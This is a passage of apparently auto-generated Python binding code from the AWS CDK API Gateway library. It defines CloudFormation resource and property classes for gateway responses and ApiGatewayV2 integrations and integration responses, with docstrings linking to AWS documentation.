:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-statuscode
"""
return jsii.get(self, "statusCode")
@status_code.setter
def status_code(self, value: typing.Optional[str]):
return jsii.set(self, "statusCode", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnGatewayResponseProps", jsii_struct_bases=[], name_mapping={'response_type': 'responseType', 'rest_api_id': 'restApiId', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'status_code': 'statusCode'})
class CfnGatewayResponseProps():
def __init__(self, *, response_type: str, rest_api_id: str, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, status_code: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::GatewayResponse``.
:param response_type: ``AWS::ApiGateway::GatewayResponse.ResponseType``.
:param rest_api_id: ``AWS::ApiGateway::GatewayResponse.RestApiId``.
:param response_parameters: ``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
:param status_code: ``AWS::ApiGateway::GatewayResponse.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html
"""
self._values = {
'response_type': response_type,
'rest_api_id': rest_api_id,
}
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if status_code is not None: self._values["status_code"] = status_code
@property
def response_type(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.ResponseType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetype
"""
return self._values.get('response_type')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-restapiid
"""
return self._values.get('rest_api_id')
@property
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responseparameters
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetemplates
"""
return self._values.get('response_templates')
@property
def status_code(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::GatewayResponse.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-statuscode
"""
return self._values.get('status_code')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnGatewayResponseProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnIntegrationResponseV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationResponseV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::IntegrationResponse``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::IntegrationResponse
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, integration_id: str, integration_response_key: str, content_handling_strategy: typing.Optional[str]=None, response_parameters: typing.Any=None, response_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::IntegrationResponse``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
:param integration_id: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
:param integration_response_key: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
:param response_parameters: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
"""
props = CfnIntegrationResponseV2Props(api_id=api_id, integration_id=integration_id, integration_response_key=integration_response_key, content_handling_strategy=content_handling_strategy, response_parameters=response_parameters, response_templates=response_templates, template_selection_expression=template_selection_expression)
jsii.create(CfnIntegrationResponseV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="integrationId")
def integration_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationid
"""
return jsii.get(self, "integrationId")
@integration_id.setter
def integration_id(self, value: str):
return jsii.set(self, "integrationId", value)
@property
@jsii.member(jsii_name="integrationResponseKey")
def integration_response_key(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationresponsekey
"""
return jsii.get(self, "integrationResponseKey")
@integration_response_key.setter
def integration_response_key(self, value: str):
return jsii.set(self, "integrationResponseKey", value)
@property
@jsii.member(jsii_name="responseParameters")
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responseparameters
"""
return jsii.get(self, "responseParameters")
@response_parameters.setter
def response_parameters(self, value: typing.Any):
return jsii.set(self, "responseParameters", value)
@property
@jsii.member(jsii_name="responseTemplates")
def response_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responsetemplates
"""
return jsii.get(self, "responseTemplates")
@response_templates.setter
def response_templates(self, value: typing.Any):
return jsii.set(self, "responseTemplates", value)
@property
@jsii.member(jsii_name="contentHandlingStrategy")
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-contenthandlingstrategy
"""
return jsii.get(self, "contentHandlingStrategy")
@content_handling_strategy.setter
def content_handling_strategy(self, value: typing.Optional[str]):
return jsii.set(self, "contentHandlingStrategy", value)
@property
@jsii.member(jsii_name="templateSelectionExpression")
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-templateselectionexpression
"""
return jsii.get(self, "templateSelectionExpression")
@template_selection_expression.setter
def template_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "templateSelectionExpression", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationResponseV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'integration_id': 'integrationId', 'integration_response_key': 'integrationResponseKey', 'content_handling_strategy': 'contentHandlingStrategy', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'template_selection_expression': 'templateSelectionExpression'})
class CfnIntegrationResponseV2Props():
def __init__(self, *, api_id: str, integration_id: str, integration_response_key: str, content_handling_strategy: typing.Optional[str]=None, response_parameters: typing.Any=None, response_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::IntegrationResponse``.
:param api_id: ``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
:param integration_id: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
:param integration_response_key: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
:param response_parameters: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html
"""
self._values = {
'api_id': api_id,
'integration_id': integration_id,
'integration_response_key': integration_response_key,
}
if content_handling_strategy is not None: self._values["content_handling_strategy"] = content_handling_strategy
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if template_selection_expression is not None: self._values["template_selection_expression"] = template_selection_expression
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-apiid
"""
return self._values.get('api_id')
@property
def integration_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationid
"""
return self._values.get('integration_id')
@property
def integration_response_key(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationresponsekey
"""
return self._values.get('integration_response_key')
@property
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-contenthandlingstrategy
"""
return self._values.get('content_handling_strategy')
@property
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responseparameters
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responsetemplates
"""
return self._values.get('response_templates')
@property
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-templateselectionexpression
"""
return self._values.get('template_selection_expression')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnIntegrationResponseV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnIntegrationV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Integration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Integration
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, integration_type: str, connection_type: typing.Optional[str]=None, content_handling_strategy: typing.Optional[str]=None, credentials_arn: typing.Optional[str]=None, description: typing.Optional[str]=None, integration_method: typing.Optional[str]=None, integration_uri: typing.Optional[str]=None, passthrough_behavior: typing.Optional[str]=None, request_parameters: typing.Any=None, request_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None, timeout_in_millis: typing.Optional[jsii.Number]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Integration``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Integration.ApiId``.
:param integration_type: ``AWS::ApiGatewayV2::Integration.IntegrationType``.
:param connection_type: ``AWS::ApiGatewayV2::Integration.ConnectionType``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
:param credentials_arn: ``AWS::ApiGatewayV2::Integration.CredentialsArn``.
:param description: ``AWS::ApiGatewayV2::Integration.Description``.
:param integration_method: ``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
:param integration_uri: ``AWS::ApiGatewayV2::Integration.IntegrationUri``.
:param passthrough_behavior: ``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
:param request_parameters: ``AWS::ApiGatewayV2::Integration.RequestParameters``.
:param request_templates: ``AWS::ApiGatewayV2::Integration.RequestTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
:param timeout_in_millis: ``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
"""
props = CfnIntegrationV2Props(api_id=api_id, integration_type=integration_type, connection_type=connection_type, content_handling_strategy=content_handling_strategy, credentials_arn=credentials_arn, description=description, integration_method=integration_method, integration_uri=integration_uri, passthrough_behavior=passthrough_behavior, request_parameters=request_parameters, request_templates=request_templates, template_selection_expression=template_selection_expression, timeout_in_millis=timeout_in_millis)
jsii.create(CfnIntegrationV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Integration.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="integrationType")
def integration_type(self) -> str:
"""``AWS::ApiGatewayV2::Integration.IntegrationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationtype
"""
return jsii.get(self, "integrationType")
@integration_type.setter
def integration_type(self, value: str):
return jsii.set(self, "integrationType", value)
@property
@jsii.member(jsii_name="requestParameters")
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requestparameters
"""
return jsii.get(self, "requestParameters")
@request_parameters.setter
def request_parameters(self, value: typing.Any):
return jsii.set(self, "requestParameters", value)
@property
@jsii.member(jsii_name="requestTemplates")
def request_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requesttemplates
"""
return jsii.get(self, "requestTemplates")
@request_templates.setter
def request_templates(self, value: typing.Any):
return jsii.set(self, "requestTemplates", value)
@property
@jsii.member(jsii_name="connectionType")
def connection_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ConnectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-connectiontype
"""
return jsii.get(self, "connectionType")
@connection_type.setter
def connection_type(self, value: typing.Optional[str]):
return jsii.set(self, "connectionType", value)
@property
@jsii.member(jsii_name="contentHandlingStrategy")
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-contenthandlingstrategy
"""
return jsii.get(self, "contentHandlingStrategy")
@content_handling_strategy.setter
def content_handling_strategy(self, value: typing.Optional[str]):
return jsii.set(self, "contentHandlingStrategy", value)
@property
@jsii.member(jsii_name="credentialsArn")
def credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.CredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-credentialsarn
"""
return jsii.get(self, "credentialsArn")
@credentials_arn.setter
def credentials_arn(self, value: typing.Optional[str]):
return jsii.set(self, "credentialsArn", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="integrationMethod")
def integration_method(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationmethod
"""
return jsii.get(self, "integrationMethod")
@integration_method.setter
def integration_method(self, value: typing.Optional[str]):
return jsii.set(self, "integrationMethod", value)
@property
@jsii.member(jsii_name="integrationUri")
def integration_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationuri
"""
return jsii.get(self, "integrationUri")
@integration_uri.setter
def integration_uri(self, value: typing.Optional[str]):
return jsii.set(self, "integrationUri", value)
@property
@jsii.member(jsii_name="passthroughBehavior")
def passthrough_behavior(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-passthroughbehavior
"""
return jsii.get(self, "passthroughBehavior")
@passthrough_behavior.setter
def passthrough_behavior(self, value: typing.Optional[str]):
return jsii.set(self, "passthroughBehavior", value)
@property
@jsii.member(jsii_name="templateSelectionExpression")
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-templateselectionexpression
"""
return jsii.get(self, "templateSelectionExpression")
@template_selection_expression.setter
def template_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "templateSelectionExpression", value)
@property
@jsii.member(jsii_name="timeoutInMillis")
def timeout_in_millis(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-timeoutinmillis
"""
return jsii.get(self, "timeoutInMillis")
@timeout_in_millis.setter
def timeout_in_millis(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "timeoutInMillis", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'integration_type': 'integrationType', 'connection_type': 'connectionType', 'content_handling_strategy': 'contentHandlingStrategy', 'credentials_arn': 'credentialsArn', 'description': 'description', 'integration_method': 'integrationMethod', 'integration_uri': 'integrationUri', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'template_selection_expression': 'templateSelectionExpression', 'timeout_in_millis': 'timeoutInMillis'})
class CfnIntegrationV2Props():
def __init__(self, *, api_id: str, integration_type: str, connection_type: typing.Optional[str]=None, content_handling_strategy: typing.Optional[str]=None, credentials_arn: typing.Optional[str]=None, description: typing.Optional[str]=None, integration_method: typing.Optional[str]=None, integration_uri: typing.Optional[str]=None, passthrough_behavior: typing.Optional[str]=None, request_parameters: typing.Any=None, request_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None, timeout_in_millis: typing.Optional[jsii.Number]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Integration``.
:param api_id: ``AWS::ApiGatewayV2::Integration.ApiId``.
:param integration_type: ``AWS::ApiGatewayV2::Integration.IntegrationType``.
:param connection_type: ``AWS::ApiGatewayV2::Integration.ConnectionType``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
:param credentials_arn: ``AWS::ApiGatewayV2::Integration.CredentialsArn``.
:param description: ``AWS::ApiGatewayV2::Integration.Description``.
:param integration_method: ``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
:param integration_uri: ``AWS::ApiGatewayV2::Integration.IntegrationUri``.
:param passthrough_behavior: ``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
:param request_parameters: ``AWS::ApiGatewayV2::Integration.RequestParameters``.
:param request_templates: ``AWS::ApiGatewayV2::Integration.RequestTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
:param timeout_in_millis: ``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html
"""
self._values = {
'api_id': api_id,
'integration_type': integration_type,
}
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling_strategy is not None: self._values["content_handling_strategy"] = content_handling_strategy
if credentials_arn is not None: self._values["credentials_arn"] = credentials_arn
if description is not None: self._values["description"] = description
if integration_method is not None: self._values["integration_method"] = integration_method
if integration_uri is not None: self._values["integration_uri"] = integration_uri
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if template_selection_expression is not None: self._values["template_selection_expression"] = template_selection_expression
if timeout_in_millis is not None: self._values["timeout_in_millis"] = timeout_in_millis
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Integration.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-apiid
"""
return self._values.get('api_id')
@property
def integration_type(self) -> str:
"""``AWS::ApiGatewayV2::Integration.IntegrationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationtype
"""
return self._values.get('integration_type')
@property
def connection_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ConnectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-connectiontype
"""
return self._values.get('connection_type')
@property
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-contenthandlingstrategy
"""
return self._values.get('content_handling_strategy')
@property
def credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.CredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-credentialsarn
"""
return self._values.get('credentials_arn')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-description
"""
return self._values.get('description')
@property
def integration_method(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationmethod
"""
return self._values.get('integration_method')
@property
def integration_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.IntegrationUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-integrationuri
"""
return self._values.get('integration_uri')
@property
def passthrough_behavior(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.PassthroughBehavior``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-passthroughbehavior
"""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requestparameters
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Integration.RequestTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-requesttemplates
"""
return self._values.get('request_templates')
@property
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Integration.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integration.html#cfn-apigatewayv2-integration-templateselectionexpression
"""
return self._values.get('template_selection_expression')
@property
def timeout_in_millis(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Integration.TimeoutInMillis``.
see
